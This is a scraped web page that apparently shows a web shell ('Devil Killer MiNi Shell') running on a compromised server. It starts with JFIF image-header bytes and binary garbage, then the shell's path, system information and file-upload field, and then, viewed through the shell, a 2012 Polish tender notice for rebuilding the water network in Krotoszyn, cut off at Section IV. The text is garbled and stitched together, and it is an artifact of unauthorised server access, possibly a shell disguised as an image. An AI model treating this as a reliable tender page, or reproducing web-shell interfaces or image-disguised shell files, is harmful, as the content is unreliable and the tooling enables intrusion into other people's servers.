JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/159490-N-2012.html

<p class="kh_header"><b>Krotoszyn: Przebudowa sieci wodociągowej w ulicach Sienkiewicza, Kołłątaja, Zdunowska w Krotoszynie - etap II</b><br>
<b>Numer ogłoszenia: 159490 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Krotoszynie , ul. Rawicka 41, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254233 w. 20, faks 062 7228000.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa sieci wodociągowej w ulicach Sienkiewicza, Kołłątaja, Zdunowska w Krotoszynie - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa sieci wodociągowej z przyłączami w ul.Zdunowskiej (na odcinku od ul. Staszica do ul. Kołłątaja), w ul. Kołłątaja oraz w ul.Sienkiewicza (od ul. Kołłątaja do skrzyżowania z ul. Piastowską Kobylińską) w ramach zadania: Przebudowa sieci wodociągowej w ulicach Sienkiewicza, Kołłątaja,Zdunowska w  Krotoszynie. Przedmiotowa ulica jest drogą krajową.
1) Zakres rzeczowy inwestycji:
a) sieć wodociągowa:
   - sieć wodociągowa z rur PE100 SDR17 PN10 O 160 mm  	- 857 mb.
   - sieć wodociągowa z rur PE100 SDR17 PN10 O  90 mm  	-   15 mb.     
    Razem:                                                                           	   872 mb. 
                  w tym:
wykonanie rurociągu metodą przewiertu sterowanego na długości 152 mb 
łączna długość przyłączy wodociągowych wynosi 191 m z  tego:
przyłączy wykonanych metodą przewiertów o długości łącznej 125 m
trójnik równoprzelewowy PETS O 160/160 mm	- 2 szt
redukcja PE TS O160/90 mm - 2 szt
tuleja kołnierzowa PE TS O 90 mm z kołnierzem i uszczelką - 12 szt
zasuwa żeliwna kołnierzowa długa O 80 mm z obudową i skrzynką - 7 szt
trójnik redukcyjny PE O 160/90 mm - 5 szt
kolano żeliwne stopowe O 80 mm - 4 szt
hydrant ppoż. podziemny DN80 - 4 szt
kolano PR TS O 160 mm < 150 - 9 szt
trójnik redukcyjny PE TS O 160/110 mm - 1 szt
tuleja kołnierzowa PE TS O 110 mm z kołnierzem i uszczelką - 2 szt
zasuwa żeliwna kołnierzowa typu E O 100 mm z obudową i skrzynką - 1 szt
tuleja kołnierzowa PE TS O 160 mm z kołnierzem i uszczelką - 2 szt
zasuwa żeliwna kołnierzowa typu E O 150 mm z obudową i skrzynką - 4 szt
śruby, nakrętki, podkładki do armatury ze stali nierdzewnej
Wymagania dotyczące rur PE:
rury PE100 SDR17 PN10 trójwarstwowe.
Wymagania dotyczące zasuw:
wnętrze kadłuba ma mieć prosty przepływ bez przewężeń i bez gniazda w miejscu zamknięcia, równoprzelotowa średnica otworu ma być równa średnicy nominalnej. Ciśnienie 1,6 Mpa. Korpus, pokrywa i klin z żeliwa sferoidalnego. Klasa żeliwa oznakowana na korpusie. Klin całkowicie pokryty gumą, wymagana wymienna nakrętka trzpienia wykonana z mosiądzu. Powleczenie klina (guma EPDM lub NBR) dopuszczone do kontaktu z wodą pitną - atest higieniczny PZH Warszawa. Wrzeciono wykonane ze stali nierdzewnej z walcowanym gwintem. Wymagane
oringowe uszczelnienie trzpienia z możliwością wymiany oringów pod ciśnieniem.
Wymagania dotyczące hydrantów podziemnych:
kolumna hydrantu monolityczna wykonana z żeliwa sferoidalnego.                
b) przyłącza wodociągowe:
- przyłącza z rur PE TS O 40 - 163 m,
-przyłacza z rur PE TS O 63 - 28 m
- ilość przyłączy -  23 szt.,
- łączna długość przyłączy-  191 mb.,
- nawiertki 160/40 mm-  19 szt.
- nawiertki 160/63 mm-  4 szt.
Wymagania dotyczące nawiertek:
korpus, głowica, obejma wykonane z żeliwa sferoidalnego. Nóż ze stali nierdzewnej. Ciśnienie robocze 1,6 Mpa. Pełna wykładzina gumowa na całym obwodzie obejmy. Suchy gwint w uszczelnieniu trzpienia. Nawiercanie pod ciśnieniem. Wszystkie elementy zabezpieczone przed korozją.
c) zakres robót do wykonania
- oznakowanie robót,
- dostawa materiałów na własny koszt z atestami i wymaganymi aprobatami technicznymi,
- wykonanie prac przygotowawczych, w tym rozbiórki istniejącej nawierzchni jezdni, krawężników, chodników, przekopy próbne oraz podwieszenie instalacji obcych,
- wykonanie wykopów  wraz z umocnieniem ścian wykopu i jego odwodnieniem,
- wykonanie studni pod przewierty sterowane,
- przygotowanie podłoża  pod przewody i armaturę sieci, przyłączy,
- ułożenie przewodów wodociągowych metodą zgrzewania z wydrukiem  parametrów zgrzewania, ułożenie przyłączy wodociągowych,
- zasypanie i zagęszczenie wykopu i studni pod przewierty z demontażem umocnień ścian wykopu i studni wraz z wymianą gruntu,
- zagęszczenie wykopów i studni potwierdzić badaniami laboratoryjnymi placówek posiadającymi  uprawnienia - koncesjonowanych (współczynniki zagęszczenia -odpowiedni dla przedmiotowej drogi krajowej),
- odtworzenie nawierzchni jezdni, krawężników, chodników i trawników,
- wywóz nadmiaru ziemi na wysypisko odpadów,
- wykonać przełączenie nowo wybudowanej sieci wodociągowej oraz przyłączy według odrębnego harmonogramu pod nadzorem Zakładu Wodociągów i Kanalizacji,
- czas przełączania sieci wodociągowej nie może trwać dłużej niż 8 godz.( czas amknięcia zasuw wodociągowych).
d) zasuwy, hydranty, nawiertki o wyżej określonych standardach należy kalkulować sporządzając kosztorys ofertowy (niezależnie od oznaczeń i symboli przyjętych w kosztorysie dołączonym do SIWZ oraz w ST).
2)Wykonawca zbowiązany jest do wykonania i poniesienia kosztów:
- wszystkich robót zawartych w pkt 1,
- zasilania w energię elektryczną i wodę placu budowy,
- wody w ilości niezbędnej do płukania i przeprowadzenia prób szczelności, przełączenia sieci przyłaczy wodociągowych,
- utrzymania i zabezpieczenia zaplecza i placu budowy,
- uporządkowania placu budowy po zakończeniu prac,
- projektu organizacji ruchu drogowego,
- organizacji ruchu i oznakowania,
- opłaty za zajęcie pasa drogowego,
- opłaty za umieszczenie urządzeń obcych w pasie drogowym,
- przygotowanie BIOZ,
- przeprowadzenia płukania z dezynfekcją  wraz z wynikami laboratoryjnymi,
- przeprowadzenia próby szczelności,
- obsługi geodezyjnej i wykonanie inwentaryzacji geodezyjnej powykonawczej,
- przeprowadzenie pomiarów i badań wymaganych w specyfikacji technicznej,
- kosztów wykonania projektu organizacji ruchu na czas prowadzenia robót, 
 oraz ich uzgodnień z GDDiA w Poznaniu,
- kosztów zapewnienia nadzoru archeologicznego,
- przekazania w eksploatację wraz z dokumentami odbiorowymi dla PGKiM,
2. Całość robót należy wykonać zgodnie z projektem budowlanym (załącznik nr 11) oraz specyfikacją techniczną wykonania i odbioru robót (załącznik nr 12). Szczegółowy zakres prac określa kosztorys ofertowy (w skład wchodzą: formularz cenowy nr 1, przedmiar robót, kosztorys ofertowy w układzie zgodnym z przedmiarem robót, tabela elementów scalonych, zestawienie robocizny, materiałów i sprzętu) -  (załącznik nr 10).
 3. Roboty związane z wykonaniem w/w zamówienia muszą być wykonane zgodnie z niniejszą specyfikacją. Roboty budowlane należy wykonać zgodnie z Ustawą - Prawo Budowlane (Dz..U. z 2006r., Nr 156, poz. 1118 z późn. zm.), sztuką budowlaną, przepisami branżowymi i wszelkimi niezbędnymi przepisami oraz zasadami współczesnej wiedzy technicznej, zapewniając bezpieczne i higieniczne warunki pracy, stosując wyroby budowlane i urządzenia posiadające stosowne atesty i aprobaty techniczne.
4. Zaoferowana przez Wykonawcę cena winna obejmować  wszystkie  koszty związane z realizacją zadania.
5. Przerwa w dostawie wody pitnej w trakcie przełączania rurociągów nie może być dłuższa niż 8 godz. (czas zamknięcia zasuw).
6. Przebudowa przedmiotowej sieci wodociągowej związana jest z równoczesną budową sieci kanalizacji sanitarnej i deszczowej . Roboty należy zsynchronizować z inwestorem budowy sieci kanalizacyjnych.
7. Zamawiający żąda przedstawienia harmonogramu rzeczowo - finansowego na prowadzenie robót, uzgodnionego i podpisanego przez inwestora budowy sieci kanalizacyjnych, do akceptacji przez Zamawiającego, w terminie 7 dni po podpisaniu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 5 Ustawy Pzp do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.11.00.00-1, 45.20.00.00-9, 45.23.13.00-8, 45.23.21.00-3, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Ustala się wadium celem zabezpieczenia oferty przez cały czas związania ofertą w wysokości 14.000,00 zł. (słownie: cztery tysiące złotych).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1). w pieniądzu;
2). w poręczeniach bankowych, lub poręczeniach Spółdzielczej Kasy Oszczędnościowo - Kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;                                                                                            
3). w gwarancjach bankowych;
4). w gwarancjach ubezpieczeniowych;
5). w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał potwierdzenia spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże, że  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy roboty budowlane polegające na  budowie sieci wodociągowej metodą  zgrzewania w tym :
-  co najmniej dwie  o wartości min. 700.000,00 zł.  brutto każda
-  co najmniej jedną o wartości min. 300.000,00 zł brutto w drodze kategorii 
krajowej lub wyższej.  Wykonawca spełni warunek, jeżeli wykaże wykonanie ww robót budowlanych, oraz przedłoży dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym tj.  jeżeli wykaże się dysponowaniem narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy robót budowlanych takimi jak: urządzenie do wykonywania przewiertów sterowanych o średnicy rury do O 200  - 1 szt., koparka samojezdna o poj.  łyżki >0,25 m3- szt.1, koparko - ładowarka  o poj. łyżki min 1,0 3 - szt. 1, samochód samowyładowczy >8 t. - szt. 3, szalunek przestawny stalowy lub aluminiowy o wysokości min. 2,0 m - szt. 2, płyta wibracyjna typu lekkiego -szt. 2, płyta wibracyjna typu ciężkiego - szt.1, stopa wibracyjna - szt. 1, piła spalinowa do cięcia asfaltu i betonu - szt. 1, młot pneumatyczny, hydrauliczny lub spalinowy - szt. 1, zgrzewarka do rur PE do 250 mm z wydrukiem parametrów zgrzewania - szt. 1, rozkładarka mas bitumicznych - szt. 1, agregat prądotwórczy -szt. 2, zespół igłofiltrów - szt. 1, niwelator - szt. 1. Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże się dysponowaniem ww niezbędnymi do wykonania zamówienia narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy robót budowlanych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia, polegający na dysponowaniu:
a) Kierownikiem budowy, który posiada:
-  uprawnienia , nadane zgodnie z ustawą Prawo budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie obejmujące kierowanie budową w zakresie zewnętrznych sieci wodociągowych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), 
- aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem właściwej Izby,
- doświadczenie - sprawowanie funkcji kierownika budowy na co najmniej jednej budowie sieci wodociągowej - o wartości minimum 700.000,00 zł. brutto,
b) Kierownikiem robót drogowych, który posiada:
- uprawnienia budowlane w specjalności drogowej,
- aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem właściwej Izby,
c) operatorem koparki samojezdnej o poj. łyżki > 0,25 m3 - 1 osoba, operatorem koparko - ładowarki o poj. łyżki min. 0,1 m3 - 1 osoba, kierowcami samochodów pow. 8 Mg - 3 osoby, operatorami narzędzi - 2 osoby, operatorami zgrzewarek - 1 osoba, monterami sieci wodociągowych - 2 osoby, operatorem rozkładarki mas bitumicznych - 1 osoba, robotnikami niewykwalifikowanymi - 2 osoby, operatorem urządzenia do wykonywania 	przewiertów sterowanych - 2 os. Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże się dysonowaniem ww osób lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonać ww. funkcje.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej polegającej na:
a) posiadaniu środków finansowych lub zdolności kredytowej w wysokości co najmniej 700.000,00 zł.,
b) posiadaniu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną sumę ubezpieczenia 700.000,00 zł. na jedno zdarzenie.  Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże się posiadaniem środków finansowych lub zdolności kredytowej w ww wysokości i jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na ww kwotę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia:
1) umowa regulująca współpracę wykonawców występujących wspólnie (umowa konsorcyjna) powinna być dostarczona przed podpisaniem umowy o udzielenie zamówienia publicznego - dotyczy wykonawców, którym zostanie udzielone zamówienie.
2) dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, o ile ustanowienie pełnomocnika nie zostało  ujęte w treści umowy, o której mowa w pkt 1).
W przypadku składania ofert przez podmioty występujące wspólnie dokumenty wymagane w punktach rozdz. VI pkt 1 ppkt. 1) i rozdz. VI pkt 4 ppkt 1) - 6) muszą być złożone przez każdy podmiot, pozostałe zaś dokumenty winny być złożone w imieniu wszystkich wykonawców przez ustanowionego pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
